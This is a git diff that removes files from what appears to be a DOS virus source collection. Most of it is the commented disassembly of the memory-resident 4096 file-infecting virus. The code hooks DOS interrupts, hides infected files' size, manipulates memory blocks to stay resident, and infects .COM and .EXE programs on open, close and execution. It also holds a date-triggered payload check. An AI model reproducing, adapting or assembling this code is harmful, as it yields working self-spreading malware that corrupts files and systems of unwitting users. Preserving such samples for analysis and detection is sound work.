- jnz loc_85 ; Jump if not zero - mov word ptr [si],720h - jmp short loc_87 ; (0CCB) -loc_85: ; xref 6FB8:0CA9 - mov ax,[bx+si] - mov ds:data_31e[bx+si],ax ; (5E5F:FF60=0FFFFh) - mov word ptr [bx+si],720h - sub word ptr cs:[980h][si],0A0h ; (6FB8:0980=0E8FBh) - mov byte ptr cs:[970h],0 ; (6FB8:0970=0Eh) - jmp short loc_88 ; (0CDE) -loc_86: ; xref 6FB8:0C95 - pop bx -loc_87: ; xref 6FB8:0CAF - mov bx,cs:data_54[si] ; (6FB8:0105=0CD09h) - add bx,0A0h - mov cs:data_54[si],bx ; (6FB8:0105=0CD09h) - mov word ptr cs:[980h][si],bx ; (6FB8:0980=0E8FBh) -loc_88: ; xref 6FB8:0C82, 0CC8 - inc si - inc si - cmp si,0A0h - jne loc_82 ; Jump if not equal - cmp byte ptr cs:[970h],0 ; (6FB8:0970=0Eh) - je loc_89 ; Jump if equal - push es - push di - push cx - push ds - pop es - push cs - pop ds - mov si,offset ds:[0CF5h] ; (6FB8:0CF5=0BEh) - xor di,di ; Zero register - mov cx,7D0h - rep movsw ; Rep when cx >0 Mov [si] to es:[di] - mov word ptr cs:[977h],0FFDCh ; (6FB8:0977=0C00Ah) - and byte ptr cs:[972h],4 ; (6FB8:0972=0BFh) - or byte ptr cs:[972h],88h ; (6FB8:0972=0BFh) - mov word ptr cs:[97Eh],0 ; (6FB8:097E=0EDE8h) - xor ax,ax ; Zero register - mov ds,ax - mov ax,word ptr cs:[973h] ; (6FB8:0973=984h) - mov ds:data_1e,ax ; (0000:0024=45h) - mov ax,word ptr cs:[975h] ; (6FB8:0975=0AAACh) - mov ds:data_2e,ax ; (0000:0026=3D1h) - pop cx - pop di - pop es -loc_89: ; xref 6FB8:0CEC - pop ds - pop si - pop bx - retn -sub_19 endp - - -; -; SUBROUTINE -; -; Called from: 6FB8:04D3, 04EC -; - -sub_20 proc near - cld ; Clear direction - pop ax - sub ax,si - add ax,di - push es - push ax - rep movsb ; Rep when cx >0 Mov [si] to es:[di] - retf ; Return far -sub_20 endp - - db 90h, 50h,0E8h,0E2h, 03h, 8Bh - -seg_a ends - - - - end start - - CROSS REFERENCE - KEY ENTRY POINTS - - seg:off type label - ---- ---- ---- --------------- - 6FB8:0100 far start - - Interrupt Usage Synopsis - - Interrupt 21h : set default drive dl (0=a:) - Interrupt 21h : get default drive al (0=a:) - Interrupt 21h : 
set DTA to ds:dx
- Interrupt 21h : get date, cx=year, dx=mon/day
- Interrupt 21h : set current dir, path @ ds:dx
- Interrupt 21h : open file, al=mode,name@ds:dx
- Interrupt 21h : close file, bx=file handle
- Interrupt 21h : read file, cx=bytes, to ds:dx
- Interrupt 21h : write file cx=bytes, to ds:dx
- Interrupt 21h : move file ptr, cx,dx=offset
- Interrupt 21h : get/set file attrb, nam@ds:dx
- Interrupt 21h : get present dir,drive dl,1=a:
- Interrupt 21h : get/set file date & time
-
- I/O Port Usage Synopsis
-
- Port 20h : 8259-1 int command
-
diff --git a/0-9/4096 (10).ASM b/0-9/4096 (10).ASM
deleted file mode 100755
index da57d58..0000000
--- a/0-9/4096 (10).ASM
+++ /dev/null
@@ -1,1902 +0,0 @@ - -PAGE 59,132 - -; -; -; VIR_ -; -; Created: ??-??-?? -; Version: -; Code type: zero start -; Passes: 9 Analysis Options on: A -; -; Disassembled by: Sir John -- 11.MAR.1991 -; -; - -PSP_0A equ 0Ah ; (0000:000A=0) -MCB_0000 equ 0 ; (7DBC:0000=E9) -MCB_0001 equ 1 ; (7DBC:0001=275h) -MCB_0003 equ 3 ; (7DBC:0003=1503h) -all_len equ 1600h -jmp_len equ 3 -sav_file equ data_23 - virus_entry + jmp_len - -seg_a segment byte public - assume cs:seg_a, ds:seg_a - - org 0 - - db 00h - - jmp vir_1 -data_23 dw 20CDh ; old file -data_24 dw 0 ; (first 6 bytes) -data_25 dw 0 ; - check sum - db 0,0,0,0,0,0,0,0 -data_27 dw 0 ; + 0eh = original SS: -data_28 dw 0 ; + 10h = original SP - dw 0 -data_29 dd 0 ; + 14h = .EXE file entry point - db 0,0,0,0 -data_31 db 0 ; flag : 1-EXE, 0-COM -data_32 db 0FEh - db 3Ah -debug: push bp ;address is 0023 - mov bp,sp - push ax - cmp [bp+4],0C000h - jae loc_1_1 ; segment > C000 - mov ax,cs:data_68 - cmp [bp+4],ax - jna loc_1_1 -loc_1: pop ax - pop bp - iret ; Interrupt return -loc_1_1: cmp byte ptr cs:data_73,1 ; (CS:1250=0) - je loc_3 ; Jump if equal - mov ax,[bp+4] - mov word ptr cs:old_INT+2,ax ; (CS:122F=70h) - mov ax,[bp+2] - mov word ptr cs:old_INT,ax ; (CS:122D=0) - jc loc_2 ; Jump if carry Set - pop ax - pop bp - mov ss,cs:data_92 ; (CS:12DD=151Ch) - mov sp,cs:data_93 ; (CS:12DF=0) - mov al,cs:data_97 ; (CS:12E5=0) - out 21h,al ; port 21h, 8259-1 int comands - jmp loc_79 ; (0D40) -loc_2: - and word ptr [bp+6],0FEFFh - mov al,cs:data_97 ; (CS:12E5=0) - out 21h,al ; port 21h, 8259-1 int comands - jmp short loc_1 ; (0037) -loc_3: - dec cs:data_74 ; (CS:1251=0) - jnz loc_1 ; Jump if not zero - and word ptr [bp+6],0FEFFh - call sub_21 ; Save REGS in vir's stack - call sub_18 ; (0DBA) - lds dx,cs:old_INT_1 ; (CS:1231=0) Load 32 bit ptr - mov al,1 - call sub_27 ; Set INT 01 vector - call sub_20 ; Restore regs from vir's stack - jmp short loc_2 ; (0067) - - -; -; SUBROUTINE -; - -sub_1 proc near - push ds - push si - xor si,si ; 
Zero register
- mov ds,si
- xor ah,ah ; Zero register
- mov si,ax
- shl si,1 ; Shift w/zeros fill
- shl si,1 ; Shift w/zeros fill
- mov bx,[si]
- mov es,[si+2]
- pop si
- pop ds
- retn
-sub_1 endp
-
-vir_1: mov cs:data_113,1600h ; (CS:135B=0)
- mov cs:old_AX,ax ; (CS:12E3=0)
- mov ah,30h
- int 21h ; DOS Services ah=function 30h
- ; get DOS version number ax
- mov cs:dos_ver,al ; (CS:12EE=0)
- mov cs:old_DS,ds ; (CS:1245=7DBDh)
- mov ah,52h
- int 21h ; DOS Services ah=function 52h
- ; get DOS data table ptr es:bx
- mov ax,es:[bx-2]
- mov cs:data_68,ax ; (CS:1247=0)
- mov es,ax
- mov ax,es:[1] ; (5200:0001=0FFFFh)
- mov cs:data_69,ax ; (CS:1249=0)
- push cs
- pop ds
- mov al,1
- call sub_1 ; Get INT 01 vector
- mov word ptr old_INT_1,bx ; (CS:1231=0)
- mov word ptr old_INT_1+2,es ; (CS:1233=70h)
- mov al,21h
- call sub_1 ; Get INT 21 vector
- mov word ptr old_INT,bx ; (CS:122D=0)
- mov word ptr old_INT+2,es ; (CS:122F=70h)
- mov byte ptr data_73,0 ; (CS:1250=0)
- mov dx,offset debug
- mov al,1
- call sub_27 ; Set INT 01 vector
- pushf ; Push flags
- pop ax
- or ax,100h
- push ax
- in al,21h ; port 21h, 8259-1 int IMR
- mov data_97,al ; (CS:12E5)
- mov al,0FFh
- out 21h,al ; port 21h, 8259-1 int comands
- popf ; Pop flags
- mov ah,52h
- pushf ; Push flags
- call dword ptr old_INT ; (CS:122D)
- pushf ; Push flags
- pop ax
- and ax,0FEFFh
- push ax
- popf ; Pop flags
- mov al,data_97 ; (CS:12E5=0)
- out 21h,al ; port 21h, 8259-1 int comands
- push ds
- lds dx,old_INT_1 ; (CS:1231=0) Load 32 bit ptr
- mov al,1
- call sub_27 ; Set INT 01 vector
- pop ds
- les di,old_INT ; (CS:122D=0) Load 32 bit ptr
- mov word ptr ptr_INT_21,di ; (CS:1235=0)
- mov word ptr ptr_INT_21+2,es ; (CS:1237=70h)
- mov byte ptr data_70,0EAh ; (CS:124B=0)
- mov data_71,offset INT_21 ; (CS:124C=0) (02CC)
- mov data_72,cs ; (CS:124E=7DBDh)
- call sub_18 ; (0DBA)
- mov ax,4B00h
- mov data_95,ah ; (CS:12E2=0)
- mov dx,offset data_32 ; (CS:0021=0FEh)
- push word ptr data_31 ; (CS:0020=0FE00h)
- int 21h
; DOS Services ah=function 4Bh - ; run progm @ds:dx, parm @es:bx - pop word ptr data_31 ; (CS:0020=0FE00h) - add word ptr es:[di-4],9 - nop - mov es,old_DS ; (CS:1245) - mov ds,old_DS ; (CS:1245) - sub word ptr ds:[2],161h ; decrement mem size - mov bp,word ptr ds:[2] ; mem size - mov dx,ds - sub bp,dx - mov ah,4Ah - mov bx,0FFFFh - int 21h ; DOS Services ah=function 4Ah - ; change mem allocation, bx=siz - mov ah,4Ah - int 21h ; DOS Services ah=function 4Ah - ; change mem allocation, bx=siz - dec dx - mov ds,dx - cmp byte ptr ds:[MCB_0000],5Ah ; (7DBC:0000=0E9h) 'Z' - je loc_4 ; Jump if equal - dec cs:data_95 ; (CS:12E2=0) -loc_4: - cmp byte ptr cs:data_95,0 ; (CS:12E2=0) - je loc_5 ; Jump if equal - mov byte ptr ds:[MCB_0000],4Dh ; (7DBC:0000=0E9h) 'M' -loc_5: - mov ax,ds:MCB_0003 ; (7DBC:0003=1503h) - mov bx,ax - sub ax,161h - add dx,ax - mov ds:MCB_0003,ax ; (7DBC:0003=1503h) - inc dx - mov es,dx - mov byte ptr es:MCB_0000,5Ah ; (915F:0000=0) 'Z' - push cs:data_69 ; (CS:1249=0) - pop word ptr es:MCB_0001 ; (915F:0001=0) - mov word ptr es:MCB_0003,160h ; (915F:0003=0) - inc dx - mov es,dx - push cs - pop ds - mov cx,all_len/2 - mov si,all_len-2 ; (CS:15FE=0) - mov di,si - std ; Set direction flag - rep movsw ; Rep when cx >0 Mov [si] to es:[di] - cld ; Clear direction - push es - mov ax,offset loc_1EE - push ax - mov es,cs:old_DS ; (CS:1245=7DBDh) - mov ah,4Ah ; 'J' - mov bx,bp - int 21h ; DOS Services ah=function 4Ah - ; change mem allocation, bx=siz - retf ; Return far - jump to loc_1EE -loc_1EE: call sub_18 ; (0DBA) - mov cs:data_72,cs ; (CS:124E=7DBDh) - call sub_18 ; (0DBA) - push cs - pop ds - mov byte ptr data_76,14h ; (CS:12A2=0) - push cs - pop es - mov di,offset data_75 ; (CS:1252=0) - mov cx,14h - xor ax,ax ; Zero register - rep stosw ; Rep when cx >0 Store ax to es:[di] - mov data_103,al ; (CS:12EF=0) - mov ax,old_DS ; (CS:1245=7DBDh) - mov es,ax - lds dx,es:[0Ah] ; from offset 000A in PSP Load 32 bit ptr - mov ds,ax - add ax,10h - add word ptr 
cs:data_29+2,ax ; (CS:001A=1ED5h) - cmp byte ptr cs:data_31,0 ; (CS:0020=0) - jne loc_6 ; Jump if not equal -; restore infected .COM file and run it - sti ; Enable interrupts - mov ax,cs:data_23 ; (CS:0004=20CDh) - mov word ptr ds:[100h],ax ; (CS:0100=0E9Ah) - mov ax,cs:data_24 ; (CS:0006=340h) - mov word ptr ds:[102h],ax ; (CS:0102=589Ch) - mov ax,cs:data_25 ; (CS:0008=50C6h) - mov word ptr ds:[104h],ax ; (CS:0104=0Dh) - push cs:old_DS ; (CS:1245=7DBDh) - mov ax,100h - push ax - mov ax,cs:old_AX ; (CS:12E3=0) - retf ; Return far -loc_6: -; restore infected .EXE file and run it - add cs:data_27,ax ; (CS:0012=68Ch) - mov ax,cs:old_AX ; (CS:12E3=0) - mov ss,cs:data_27 ; (CS:0012=68Ch) - mov sp,cs:data_28 ; (CS:0014) original SP - sti ; Enable interrupts - jmp cs:data_29 ; (CS:0018=12Bh) -virus_entry: cmp sp,100h - ja loc_7 ; Jump if above - xor sp,sp ; Zero register -loc_7: - mov bp,ax - call sub_2 ; (0275) -sub_2: pop cx - sub cx,offset sub_2 - mov ax,cs - mov bx,10h - mul bx ; dx:ax = ax * 10 - add ax,cx ; cx = virus begin address - adc dx,0 - div bx ; ax,dx rem=dx:ax/10 - push ax ; ax = new segment - mov ax,offset vir_1 - push ax - mov ax,bp - retf ; Return far - jump to vir_1 - -table db 30h - dw offset _21_30 - db 23h - dw offset _21_23 - db 37h - dw offset _21_37 - db 4bh - dw offset _21_4B - db 3ch - dw offset _21_3C - db 3dh - dw offset _21_3D - db 3Eh - dw offset _21_3E - db 0Fh - dw offset _21_0F - db 14h - dw offset _21_14 - db 21h - dw offset _21_21 - db 27h - dw offset _21_27 - db 11h - dw offset _21_11_12 - db 12h - dw offset _21_11_12 - db 4Eh - dw offset _21_4E_4F - db 4Fh - dw offset _21_4E_4F - db 3Fh - dw offset _21_3F - db 40h - dw offset _21_40 - db 42h - dw offset _21_42 - db 57h - dw offset _21_57 - db 48h - dw offset _21_48 -end_tbl: -INT_21: cmp ax,4b00h - jnz loc_8_1 - mov cs:data_95,al -loc_8_1: push bp - mov bp,sp - push [bp+6] ; flags - pop cs:data_85 - pop bp ; ??? - push bp ; ??? 
- mov bp,sp
- call sub_21 ; Save REGS in vir's stack
- call sub_18 ; xchg info in INT 21
- call sub_15 ; BREAK = OFF
- call sub_20 ; Restore regs from vir's stack
- call sub_17 ; Save REGS
- push bx
- mov bx,offset table
-loc_8:
- cmp ah,cs:[bx]
- jne loc_9 ; Jump if not equal
- mov bx,cs:[bx+1]
- xchg bx,[bp-14h]
- cld ; Clear direction
- retn
-loc_9:
- add bx,3
- cmp bx,offset end_tbl
- jb loc_8 ; Jump if below
- pop bx
-loc_10:
- call sub_16 ; Restore BREAK state
- in al,21h ; port 21h, 8259-1 int IMR
- mov cs:data_97,al ; (CS:12E5=0)
- mov al,0FFh
- out 21h,al ; port 21h, 8259-1 int comands
- mov byte ptr cs:data_74,4 ; (CS:1251=0)
- mov byte ptr cs:data_73,1 ; (CS:1250=0)
- call sub_22 ; Set INT 01 for debuging
- call sub_19 ; Restore REGS
- push ax
- mov ax,cs:data_85 ; (CS:12B3=0)
- or ax,100h
- push ax
- popf ; Pop flags
- pop ax
- pop bp
- jmp dword ptr cs:ptr_INT_21 ; (CS:1235=0)
-loc_11:
- call sub_21 ; Save REGS in vir's stack
- call sub_16 ; (0D9B)
- call sub_18 ; (0DBA)
- call sub_20 ; Restore regs from vir's stack
- pop bp
- push bp
- mov bp,sp
- push cs:data_85 ; (CS:12B3=0)
- pop word ptr [bp+6]
- pop bp
- iret ; Interrupt return
-_21_11_12: call sub_19 ; Restore REGS
- call sub_24 ; INT 21
- or al,al ; Zero ?
- jnz loc_11 ; Jump if not zero
- call sub_17 ; Save REGS
- call sub_3 ; (0581)
- mov al,0
- cmp byte ptr [bx],0FFh
- jne loc_12 ; Jump if not equal
- mov al,[bx+6]
- add bx,7
-loc_12:
- and cs:data_104,al ; (CS:12F0=0)
- test byte ptr [bx+1Ah],80h
- jz loc_13 ; Jump if zero
- sub byte ptr [bx+1Ah],0C8h
- cmp byte ptr cs:data_104,0 ; (CS:12F0=0)
- jne loc_13 ; Jump if not equal
- sub word ptr [bx+1Dh],1000h
- sbb word ptr [bx+1Fh],0
-loc_13:
- call sub_19 ; Restore REGS
- jmp short loc_11 ; (033F)
-_21_0F: call sub_19 ; Restore REGS
- call sub_24 ; INT 21
- call sub_17 ; Save REGS
- or al,al ; Zero ?
- jnz loc_13 ; Jump if not zero - mov bx,dx - test byte ptr [bx+15h],80h - jz loc_13 ; Jump if zero - sub byte ptr [bx+15h],0C8h - sub word ptr [bx+10h],1000h - sbb byte ptr [bx+12h],0 - jmp short loc_13 ; (0396) -_21_27: jcxz loc_15 ; Jump if cx=0 -_21_21: mov bx,dx - mov si,[bx+21h] - or si,[bx+23h] - jnz loc_15 ; Jump if not zero - jmp short loc_14 ; (03D7) -_21_14: mov bx,dx - mov ax,[bx+0Ch] - or al,[bx+20h] - jnz loc_15 ; Jump if not zero -loc_14: - call sub_7 ; (0919) - jnc loc_16 ; Jump if carry=0 -loc_15: - jmp loc_10 ; (030F) -loc_16: - call sub_19 ; Restore REGS - call sub_17 ; Save REGS - call sub_24 ; INT 21 - mov [bp-4],ax - mov [bp-8],cx - push ds - push dx - call sub_3 ; (0581) - cmp word ptr [bx+14h],1 - je loc_17 ; Jump if equal - mov ax,[bx] - add ax,[bx+2] - add ax,[bx+4] - jz loc_17 ; Jump if zero - add sp,4 - jmp short loc_13 ; (0396) -loc_17: - pop dx - pop ds - mov si,dx - push cs - pop es - mov di,offset data_86 ; (CS:12B5=0) - mov cx,25h - rep movsb ; Rep when cx >0 Mov [si] to es:[di] - mov di,offset data_86 ; (CS:12B5=0) - push cs - pop ds - mov ax,[di+10h] - mov dx,[di+12h] - add ax,100Fh - adc dx,0 - and ax,0FFF0h - mov [di+10h],ax - mov [di+12h],dx - sub ax,0FFCh - sbb dx,0 - mov [di+21h],ax - mov [di+23h],dx - mov word ptr [di+0Eh],1 - mov cx,1Ch - mov dx,di - mov ah,27h ; ''' - call sub_24 ; INT 21 - jmp loc_13 ; (0396) -_21_23: push cs - pop es - mov si,dx - mov di,offset data_86 ; (CS:12B5=0) - mov cx,25h - rep movsb ; Rep when cx >0 Mov [si] to es:[di] - push ds - push dx - push cs - pop ds - mov dx,offset data_86 ; CS:12B5 - mov ah,0Fh - call sub_24 ; INT 21 - mov ah,10h - call sub_24 ; INT 21 - test byte ptr data_89,80h ; (CS:12CA=0) - pop si - pop ds - jz loc_20 ; Jump if zero - les bx,cs:data_88 ; (CS:12C5=0) Load 32 bit ptr - mov ax,es - sub bx,1000h - sbb ax,0 - xor dx,dx ; Zero register - mov cx,cs:data_87 ; (CS:12C3=0) - dec cx - add bx,cx - adc ax,0 - inc cx - div cx ; ax,dx rem=dx:ax/reg - mov [si+23h],ax - xchg ax,dx - 
xchg ax,bx - div cx ; ax,dx rem=dx:ax/reg - mov [si+21h],ax - jmp loc_13 ; (0396) -_21_4E_4F: and cs:data_85,0FFFEh ; (CS:12B3=0) - call sub_19 ; Restore REGS - call sub_24 ; INT 21 - call sub_17 ; Save REGS - jnc loc_18 ; Jump if carry=0 - or cs:data_85,1 ; (CS:12B3=0) - jmp loc_13 ; (0396) -loc_18: - call sub_3 ; (0581) - test byte ptr [bx+19h],80h - jnz loc_19 ; Jump if not zero - jmp loc_13 ; (0396) -loc_19: - sub word ptr [bx+1Ah],1000h - sbb word ptr [bx+1Ch],0 - sub byte ptr [bx+19h],0C8h - jmp loc_13 ; (0396) -_21_3C: push cx - and cx,7 - cmp cx,7 - je loc_23 ; Jump if equal - pop cx - call sub_13 ; (0CC6) - call sub_24 ; INT 21 - call sub_14 ; (0D6C) - pushf ; Push flags - cmp byte ptr cs:data_90,0 ; (CS:12DA=0) - je loc_21 ; Jump if equal - popf ; Pop flags -loc_20: - jmp loc_10 ; (030F) -loc_21: - popf ; Pop flags - jc loc_22 ; Jump if carry Set - mov bx,ax - mov ah,3Eh ; '>' - call sub_24 ; INT 21 - jmp short _21_3D ; (0511) -loc_22: - or byte ptr cs:data_85,1 ; (CS:12B3=0) - mov [bp-4],ax - jmp loc_13 ; (0396) -loc_23: - pop cx - jmp loc_10 ; (030F) -_21_3D: - call sub_9 ; Get PSP segment - call sub_8 ; (0925) - jc loc_26 ; Jump if carry Set - cmp byte ptr cs:data_76,0 ; (CS:12A2=0) - je loc_26 ; Jump if equal - call sub_10 ; (097E) - cmp bx,0FFFFh - je loc_26 ; Jump if equal - dec cs:data_76 ; (CS:12A2=0) - push cs - pop es - mov di,offset data_75 ; (CS:1252=0) - mov cx,14h - xor ax,ax ; Zero register - repne scasw ; Rep zf=0+cx >0 Scan es:[di] for ax - mov ax,cs:data_77 ; (CS:12A3=0) - mov es:[di-2],ax - mov es:[di+26h],bx - mov [bp-4],bx -loc_25: - and byte ptr cs:data_85,0FEh ; (CS:12B3=0) - jmp loc_13 ; (0396) -loc_26: - jmp loc_10 ; (030F) -_21_3E: push cs - pop es - call sub_9 ; Get PSP segment - mov di,offset data_75 ; (CS:1252=0) - mov cx,14h - mov ax,cs:data_77 ; (CS:12A3=0) -loc_27: - repne scasw ; Rep zf=0+cx >0 Scan es:[di] for ax - jnz loc_28 ; Jump if not zero - cmp bx,es:[di+26h] - jne loc_27 ; Jump if not equal - mov word ptr 
es:[di-2],0 - call sub_4 ; (0793) - infect file - inc cs:data_76 ; (CS:12A2=0) - jmp short loc_25 ; (0549) -loc_28: - jmp loc_10 ; (030F) - -; -; SUBROUTINE -; - -sub_3 proc near - push es - mov ah,2Fh ; '/' - call sub_24 ; INT 21 - push es - pop ds - pop es - retn -sub_3 endp - -_21_4B: or al,al ; Zero ? - jz loc_29 ; Jump if zero - jmp loc_36 ; (06E0) -loc_29: - push ds - push dx - mov cs:prm_blck_adr,bx ; (CS:1224) save EXEC block offset - mov word ptr cs:prm_blck_adr+2,es ; (CS:1226) save EXEC block segment - lds si,dword ptr cs:prm_blck_adr ; (CS:1224) Load EXEC block address - mov di,offset exec_block ; (CS:12F1) - mov cx,0Eh - push cs - pop es - rep movsb ; Save EXEC param block - pop si - pop ds - mov di,offset file_name ; (CS:1307) - mov cx,50h - rep movsb ; Save file name - mov bx,0FFFFh - call sub_23 ; (0E3A) - call sub_19 ; Restore REGS - pop bp - pop cs:data_98 ; (CS:12E6=0) - pop cs:data_99 ; (CS:12E8=0) - pop cs:data_85 ; (CS:12B3=0) - mov ax,4B01h - push cs - pop es - mov bx,offset exec_block - pushf ; Push flags - call dword ptr cs:ptr_INT_21 ; (CS:1235=0) - jnc loc_30 ; Jump if carry=0 - or cs:data_85,1 ; (CS:12B3=0) - push cs:data_85 ; (CS:12B3=0) - push cs:data_99 ; (CS:12E8=0) - push cs:data_98 ; (CS:12E6=0) - push bp - mov bp,sp - les bx,dword ptr cs:prm_blck_adr ; (CS:1224=0) Load 32 bit ptr - jmp loc_11 ; (033F) -loc_30: - call sub_9 ; Get PSP segment - push cs - pop es - mov di,offset data_75 ; (CS:1252=0) - mov cx,14h -loc_31: - mov ax,cs:data_77 ; (CS:12A3=0) - repne scasw ; Rep zf=0+cx >0 Scan es:[di] for ax - jnz loc_32 ; Jump if not zero - mov word ptr es:[di-2],0 - inc cs:data_76 ; (CS:12A2=0) - jmp short loc_31 ; (060B) -loc_32: - lds si,cs:entry_point ; (CS:1303=0) Load 32 bit ptr - cmp si,1 ; already infected? 
- jne loc_33 ; Jump if not equal - mov dx,word ptr ds:data_29+2 ; (0000:001A) - original entry point segment - add dx,10h - mov ah,51h - call sub_24 ; INT 21 - get PSP segment - add dx,bx - mov word ptr cs:entry_point+2,dx ; (CS:1305=0) - push word ptr ds:data_29 ; (0000:0018) - original entry point offset - pop word ptr cs:entry_point ; (CS:1303=0) - add bx,10h - add bx,ds:data_27 ; (0000:0012) - original SS: - mov cs:data_107,bx ; (CS:1301=0) - push word ptr ds:data_28 ; (0000:0014) - original SP - pop cs:data_106 ; (CS:12FF=0) - jmp short loc_34 ; (067F) -loc_33: - mov ax,[si] - add ax,[si+2] - add ax,[si+4] - jz loc_35 ; Jump if zero - push cs - pop ds - mov dx,offset file_name - call sub_8 ; (0925) - call sub_10 ; (097E) - inc cs:data_103 ; (CS:12EF=0) - call sub_4 ; infect file - dec cs:data_103 ; (CS:12EF=0) -loc_34: - mov ah,51h - call sub_24 ; INT 21 - call sub_21 ; Save REGS in vir's stack - call sub_16 ; (0D9B) - call sub_18 ; (0DBA) - call sub_20 ; Restore REGS from vir's stack - mov ds,bx - mov es,bx - push cs:data_85 ; (CS:12B3=0) - push cs:data_99 ; (CS:12E8=0) - push cs:data_98 ; (CS:12E6=0) - pop word ptr ds:PSP_0A ; offset 0A in PSP - pop word ptr ds:PSP_0A+2 ; offset 0C in PSP - push ds - lds dx,dword ptr ds:PSP_0A ; offset 0A in PSP - terminate address - mov al,22h - call sub_27 ; Set INT 22 vector - pop ds - popf ; Pop flags - pop ax - mov ss,cs:data_107 ; (CS:1301=0) - mov sp,cs:data_106 ; (CS:12FF=0) - jmp dword ptr cs:entry_point ; (CS:1303=0) -loc_35: - mov bx,[si+1] - mov ax,ds:[bx+si+sav_file] ; (0000:FD9F) - mov [si],ax - mov ax,ds:[bx+si+sav_file+2] ; (0000:FDA1) - mov [si+2],ax - mov ax,ds:[bx+si+sav_file+4] ; (0000:FDA3) - mov [si+4],ax - jmp short loc_34 ; (067F) -loc_36: - cmp al,1 - je loc_37 ; Jump if equal - jmp loc_10 ; (030F) -loc_37: - or cs:data_85,1 ; (CS:12B3=0) - mov cs:prm_blck_adr,bx ; (CS:1224=0) - mov word ptr cs:prm_blck_adr+2,es ; (CS:1226=7DBDh) - call sub_19 ; Restore REGS - call sub_24 ; INT 21 - call sub_17 ; 
Save REGS - les bx,dword ptr cs:prm_blck_adr ; (CS:1224) Load EXEC param block address - lds si,dword ptr es:[bx+12h] ; Load CS:IP from EXEC parameter block - jc loc_40 ; Jump if carry Set - and byte ptr cs:data_85,0FEh ; (CS:12B3=0) - cmp si,1 ; infected .EXE ? - je loc_38 ; Jump if equal - mov ax,[si] - add ax,[si+2] - add ax,[si+4] - jnz loc_39 ; Jump if not zero - mov bx,[si+1] - mov ax,ds:[bx+si+sav_file] ; (013B:FD9F) saved original file - mov [si],ax - mov ax,ds:[bx+si+sav_file+2] ; (013B:FDA1) saved original file - mov [si+2],ax - mov ax,ds:[bx+si+sav_file+4] ; (013B:FDA3) saved original file - mov [si+4],ax - jmp short loc_39 ; (0765) -loc_38: - mov dx,word ptr ds:data_29+2 ; (013B:001A=2E09h) - call sub_9 ; Get PSP segment - mov cx,cs:data_77 ; (CS:12A3) - PSP segment - add cx,10h - add dx,cx - mov es:[bx+14h],dx - mov ax,word ptr ds:data_29 ; (013B:0018=7332h) - mov es:[bx+12h],ax - mov ax,ds:data_27 ; (013B:0012=2E08h) - add ax,cx - mov es:[bx+10h],ax - mov ax,ds:data_28 ; (013B:0014=3E80h) - mov es:[bx+0Eh],ax -loc_39: - call sub_9 ; Get PSP segment - mov ds,cs:data_77 ; (CS:12A3=0) - mov ax,[bp+2] - mov ds:PSP_0A,ax ; (0000:000A=0F000h) - mov ax,[bp+4] - mov word ptr ds:PSP_0A+2,ax ; (0000:000C=7F6h) -loc_40: - jmp loc_13 ; (0396) -_21_30: mov byte ptr cs:data_104,0 ; (CS:12F0=0) - mov ah,2Ah - call sub_24 ; INT 21 - cmp dx,916h - jb loc_41 ; Jump if below - call sub_28 ; (0FB2) -loc_41: - jmp loc_10 ; (030F) - -; -; SUBROUTINE - INFECTION -; - -sub_4 proc near - call sub_13 ; (0CC6) - call sub_5 ; (0855) - mov byte ptr data_31,1 ; (CS:0020=0) - cmp data_38,5A4Dh ; (CS:1200=0) - je loc_42 ; Jump if equal - cmp data_38,4D5Ah ; (CS:1200=0) - je loc_42 ; Jump if equal - dec byte ptr data_31 ; (CS:0020=0) - jz loc_45 ; Jump if zero -loc_42: -; .EXE file infect - mov ax,data_41 ; (CS:1204=0) - shl cx,1 ; Shift w/zeros fill - mul cx ; dx:ax = reg * ax - add ax,200h - cmp ax,si - jb loc_44 ; Jump if below - mov ax,data_43 ; (CS:120A=0) - or ax,data_44 ; 
(CS:120C=0) - jz loc_44 ; Jump if zero - mov ax,data_80 ; (CS:12A9=0) - mov dx,data_81 ; (CS:12AB=0) - mov cx,200h - div cx ; ax,dx rem=dx:ax/reg - or dx,dx ; Zero ? - jz loc_43 ; Jump if zero - inc ax -loc_43: - mov data_41,ax ; (CS:1204=0) - mov data_40,dx ; (CS:1202=0) - cmp data_48,1 ; (CS:1214=0) - je loc_46 ; Jump if equal - mov data_48,1 ; (CS:1214=0) - mov ax,si - sub ax,data_42 ; (CS:1208=0) - mov data_49,ax ; (CS:1216=0) - add data_41,8 ; (CS:1204=0) - mov data_45,ax ; (CS:120E=0) - mov data_46,1000h ; (CS:1210=0) BUG BUG BUG!!! - ; When .EXE file is infected, - ; the end of the virus wil be - ; damaged. (sp = 1000) - call sub_6 ; (08B3) -loc_44: - jmp short loc_46 ; (084C) -loc_45: -; .COM file infect - cmp si,0F00h ; file len in paragraphs - jae loc_46 ; Jump if above or = - mov ax,data_38 ; (CS:1200=0) - mov data_23,ax ; (CS:0004=20CDh) - add dx,ax - mov ax,data_40 ; (CS:1202=0) - mov data_24,ax ; (CS:0006=340h) - add dx,ax - mov ax,data_41 ; (CS:1204=0) - mov data_25,ax ; (CS:0008=50C6h) - add dx,ax - jz loc_46 ; Jump if zero - allready infected - mov cl,0E9h - mov byte ptr data_38,cl ; (CS:1200=0) - mov ax,10h - mul si ; dx:ax = reg * ax - add ax,265h - mov word ptr data_38+1,ax ; (CS:1201=0) - mov ax,data_38 ; (CS:1200=0) - add ax,data_40 ; (CS:1202=0) - neg ax - mov data_41,ax ; (CS:1204=0) - call sub_6 ; (08B3) -loc_46: - mov ah,3Eh ; '>' - call sub_24 ; INT 21 - call sub_14 ; (0D6C) - retn -sub_4 endp - - -; -; SUBROUTINE -; - -sub_5 proc near - push cs - pop ds - mov ax,5700h - call sub_24 ; INT 21 - mov data_53,cx ; (CS:1229=0) - mov data_54,dx ; (CS:122B=0) - mov ax,4200h - xor cx,cx ; Zero register - mov dx,cx - call sub_24 ; INT 21 - mov ah,3Fh ; '?' - mov cl,1Ch - mov dx,1200h - call sub_24 ; INT 21 - mov ax,4200h - xor cx,cx ; Zero register - mov dx,cx - call sub_24 ; INT 21 - mov ah,3Fh ; '?' 
